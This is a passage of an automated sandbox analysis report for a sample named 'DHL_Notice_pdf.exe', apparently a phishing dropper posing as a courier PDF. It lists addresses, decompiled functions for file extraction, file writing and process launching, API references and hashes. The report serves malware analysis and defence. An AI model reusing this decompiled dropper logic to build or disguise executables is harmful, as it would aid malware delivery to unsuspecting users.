                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00000000
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x004073cb
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00000000
                                                            0x00407489
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00407447
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c7
                                                            0x004074c7
                                                            0x004074cb
                                                            0x0040752b
                                                            0x0040752e
                                                            0x00407533
                                                            0x00407534
                                                            0x00407536
                                                            0x00407538
                                                            0x0040753b
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x0040744d
                                                            0x00407447
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074eb
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x0040751d
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244
                                                            0x00407247
                                                            0x0040724a
                                                            0x0040724a
                                                            0x0040724d
                                                            0x0040724d
                                                            0x00407250
                                                            0x00407257
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x00000000
                                                            0x00407259
                                                            0x00000000
                                                            0x00407259
                                                            0x00407257
                                                            0x004071dd
                                                            0x004071e0
                                                            0x004071e2
                                                            0x004071e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f44
                                                            0x00406f44
                                                            0x00406f48
                                                            0x0040758d
                                                            0x00000000
                                                            0x0040758d
                                                            0x00406f4e
                                                            0x00406f51
                                                            0x00406f54
                                                            0x00406f57
                                                            0x00406f5a
                                                            0x00406f5d

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E00403479(intOrPtr _a4) {
                                                            				intOrPtr _t11;
                                                            				signed int _t12;
                                                            				void* _t14;
                                                            				void* _t15;
                                                            				long _t16;
                                                            				void* _t18;
                                                            				intOrPtr _t31;
                                                            				intOrPtr _t34;
                                                            				intOrPtr _t36;
                                                            				void* _t37;
                                                            				intOrPtr _t49;
                                                            
                                                            				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                                            				 *0x42a26c = GetTickCount() + 0x1f4;
                                                            				if(_t34 <= 0) {
                                                            					L22:
                                                            					E0040302E(1);
                                                            					return 0;
                                                            				}
                                                            				E004035F8( *0x420f04);
                                                            				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                            				 *0x420f00 = _t34;
                                                            				 *0x420ef0 = 0;
                                                            				while(1) {
                                                            					_t31 = 0x4000;
                                                            					_t11 =  *0x420ef8 -  *0x420f04;
                                                            					if(_t11 <= 0x4000) {
                                                            						_t31 = _t11;
                                                            					}
                                                            					_t12 = E004035E2(0x414ef0, _t31);
                                                            					if(_t12 == 0) {
                                                            						break;
                                                            					}
                                                            					 *0x420f04 =  *0x420f04 + _t31;
                                                            					 *0x40ce80 = 0x414ef0;
                                                            					 *0x40ce84 = _t31;
                                                            					L6:
                                                            					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                            						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                            						E0040302E(0);
                                                            					}
                                                            					 *0x40ce88 = 0x40cef0;
                                                            					 *0x40ce8c = 0x8000; // executed
                                                            					_t14 = E00406BB0(0x40ce68); // executed
                                                            					if(_t14 < 0) {
                                                            						goto L20;
                                                            					}
                                                            					_t36 =  *0x40ce88; // 0x40f21d
                                                            					_t37 = _t36 - 0x40cef0;
                                                            					if(_t37 == 0) {
                                                            						__eflags =  *0x40ce84; // 0x0
                                                            						if(__eflags != 0) {
                                                            							goto L20;
                                                            						}
                                                            						__eflags = _t31;
                                                            						if(_t31 == 0) {
                                                            							goto L20;
                                                            						}
                                                            						L16:
                                                            						_t16 =  *0x420ef4;
                                                            						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                            							continue;
                                                            						}
                                                            						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                            						goto L22;
                                                            					}
                                                            					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                            					if(_t18 == 0) {
                                                            						_push(0xfffffffe);
                                                            						L21:
                                                            						_pop(_t15);
                                                            						return _t15;
                                                            					}
                                                            					 *0x40ce60 =  *0x40ce60 + _t37;
                                                            					_t49 =  *0x40ce84; // 0x0
                                                            					if(_t49 != 0) {
                                                            						goto L6;
                                                            					}
                                                            					goto L16;
                                                            					L20:
                                                            					_push(0xfffffffd);
                                                            					goto L21;
                                                            				}
                                                            				return _t12 | 0xffffffff;
                                                            			}

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 0040348D
                                                              • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer$CountTick
                                                            • String ID:
                                                            • API String ID: 1092082344-0
                                                            • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                            • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 41%
                                                            			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                                                            				int _t9;
                                                            				long _t13;
                                                            				WCHAR* _t14;
                                                            
                                                            				_t14 = _a4;
                                                            				_t13 = E00406133(_t14);
                                                            				if(_t13 == 0xffffffff) {
                                                            					L8:
                                                            					return 0;
                                                            				}
                                                            				_push(_t14);
                                                            				if((_a8 & 0x00000001) == 0) {
                                                            					_t9 = DeleteFileW();
                                                            				} else {
                                                            					_t9 = RemoveDirectoryW(); // executed
                                                            				}
                                                            				if(_t9 == 0) {
                                                            					if((_a8 & 0x00000004) == 0) {
                                                            						SetFileAttributesW(_t14, _t13);
                                                            					}
                                                            					goto L8;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                              • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                            • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                            • String ID:
                                                            • API String ID: 1655745494-0
                                                            • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                            • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                            • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                            • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406AE0(void* __ecx, void* _a4) {
                                                            				long _v8;
                                                            				long _t6;
                                                            
                                                            				_t6 = WaitForSingleObject(_a4, 0x64);
                                                            				while(_t6 == 0x102) {
                                                            					E00406A71(0xf);
                                                            					_t6 = WaitForSingleObject(_a4, 0x64);
                                                            				}
                                                            				GetExitCodeProcess(_a4,  &_v8); // executed
                                                            				return _v8;
                                                            			}

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                            • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: ObjectSingleWait$CodeExitProcess
                                                            • String ID:
                                                            • API String ID: 2567322000-0
                                                            • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                            • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                            • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                            • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                            				long _v8;
                                                            				long _t21;
                                                            				long _t22;
                                                            				void* _t24;
                                                            				long _t26;
                                                            				int _t27;
                                                            				long _t28;
                                                            				void* _t29;
                                                            				void* _t30;
                                                            				long _t31;
                                                            				long _t32;
                                                            				long _t36;
                                                            
                                                            				_t21 = _a4;
                                                            				if(_t21 >= 0) {
                                                            					_t32 = _t21 +  *0x42a2b8;
                                                            					 *0x420ef4 = _t32;
                                                            					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                            				}
                                                            				_t22 = E00403479(4);
                                                            				if(_t22 >= 0) {
                                                            					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                            					if(_t24 == 0) {
                                                            						L18:
                                                            						_push(0xfffffffd);
                                                            						goto L19;
                                                            					} else {
                                                            						 *0x420ef4 =  *0x420ef4 + 4;
                                                            						_t36 = E00403479(_a4);
                                                            						if(_t36 < 0) {
                                                            							L21:
                                                            							_t22 = _t36;
                                                            						} else {
                                                            							if(_a12 != 0) {
                                                            								_t26 = _a4;
                                                            								if(_t26 >= _a16) {
                                                            									_t26 = _a16;
                                                            								}
                                                            								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                            								if(_t27 != 0) {
                                                            									_t36 = _v8;
                                                            									 *0x420ef4 =  *0x420ef4 + _t36;
                                                            									goto L21;
                                                            								} else {
                                                            									goto L18;
                                                            								}
                                                            							} else {
                                                            								if(_a4 <= 0) {
                                                            									goto L21;
                                                            								} else {
                                                            									while(1) {
                                                            										_t28 = _a4;
                                                            										if(_a4 >= 0x4000) {
                                                            											_t28 = 0x4000;
                                                            										}
                                                            										_v8 = _t28;
                                                            										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                            										if(_t29 == 0) {
                                                            											goto L18;
                                                            										}
                                                            										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                            										if(_t30 == 0) {
                                                            											_push(0xfffffffe);
                                                            											L19:
                                                            											_pop(_t22);
                                                            										} else {
                                                            											_t31 = _v8;
                                                            											_a4 = _a4 - _t31;
                                                            											 *0x420ef4 =  *0x420ef4 + _t31;
                                                            											_t36 = _t36 + _t31;
                                                            											if(_a4 > 0) {
                                                            												continue;
                                                            											} else {
                                                            												goto L21;
                                                            											}
                                                            										}
                                                            										goto L22;
                                                            									}
                                                            									goto L18;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L22:
                                                            				return _t22;
                                                            			}
















                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                            • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E00401389(signed int _a4) {
                                                            				intOrPtr* _t6;
                                                            				void* _t8;
                                                            				void* _t10;
                                                            				signed int _t11;
                                                            				void* _t12;
                                                            				signed int _t16;
                                                            				signed int _t17;
                                                            				void* _t18;
                                                            
                                                            				_t17 = _a4;
                                                            				while(_t17 >= 0) {
                                                            					_t6 = _t17 * 0x1c +  *0x42a290;
                                                            					if( *_t6 == 1) {
                                                            						break;
                                                            					}
                                                            					_push(_t6); // executed
                                                            					_t8 = E00401434(); // executed
                                                            					if(_t8 == 0x7fffffff) {
                                                            						return 0x7fffffff;
                                                            					}
                                                            					_t10 = E0040136D(_t8);
                                                            					if(_t10 != 0) {
                                                            						_t11 = _t10 - 1;
                                                            						_t16 = _t17;
                                                            						_t17 = _t11;
                                                            						_t12 = _t11 - _t16;
                                                            					} else {
                                                            						_t12 = _t10 + 1;
                                                            						_t17 = _t17 + 1;
                                                            					}
                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                            						 *0x42924c =  *0x42924c + _t12;
                                                            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                                            					}
                                                            				}
                                                            				return 0;
                                                            			}












                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405C4B(WCHAR* _a4) {
                                                            				struct _PROCESS_INFORMATION _v20;
                                                            				int _t7;
                                                            
                                                            				0x426750->cb = 0x44;
                                                            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                            				if(_t7 != 0) {
                                                            					CloseHandle(_v20.hThread);
                                                            					return _v20.hProcess;
                                                            				}
                                                            				return _t7;
                                                            			}






                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406A35(signed int _a4) {
                                                            				struct HINSTANCE__* _t5;
                                                            				signed int _t10;
                                                            
                                                            				_t10 = _a4 << 3;
                                                            				_t8 =  *(_t10 + 0x40a410);
                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                            				if(_t5 != 0) {
                                                            					L2:
                                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                            				}
                                                            				_t5 = E004069C5(_t8); // executed
                                                            				if(_t5 == 0) {
                                                            					return 0;
                                                            				}
                                                            				goto L2;
                                                            			}






                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                              • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                            				signed int _t5;
                                                            				void* _t6;
                                                            
                                                            				_t5 = GetFileAttributesW(_a4); // executed
                                                            				asm("sbb ecx, ecx");
                                                            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                            				return _t6;
                                                            			}






                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 0040615C
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406133(WCHAR* _a4) {
                                                            				signed char _t3;
                                                            				signed char _t7;
                                                            
                                                            				_t3 = GetFileAttributesW(_a4); // executed
                                                            				_t7 = _t3;
                                                            				if(_t7 != 0xffffffff) {
                                                            					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                            				}
                                                            				return _t7;
                                                            			}






                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405C16(WCHAR* _a4) {
                                                            				int _t2;
                                                            
                                                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                            				if(_t2 == 0) {
                                                            					return GetLastError();
                                                            				}
                                                            				return 0;
                                                            			}





                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                            • GetLastError.KERNEL32 ref: 00405C2A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040620A(void* _a4, void* _a8, long _a12) {
                                                            				int _t7;
                                                            				long _t11;
                                                            
                                                            				_t11 = _a12;
                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}






                                                            APIs
                                                            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040F21D,0040CEF0,00403579,0040CEF0,0040F21D,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
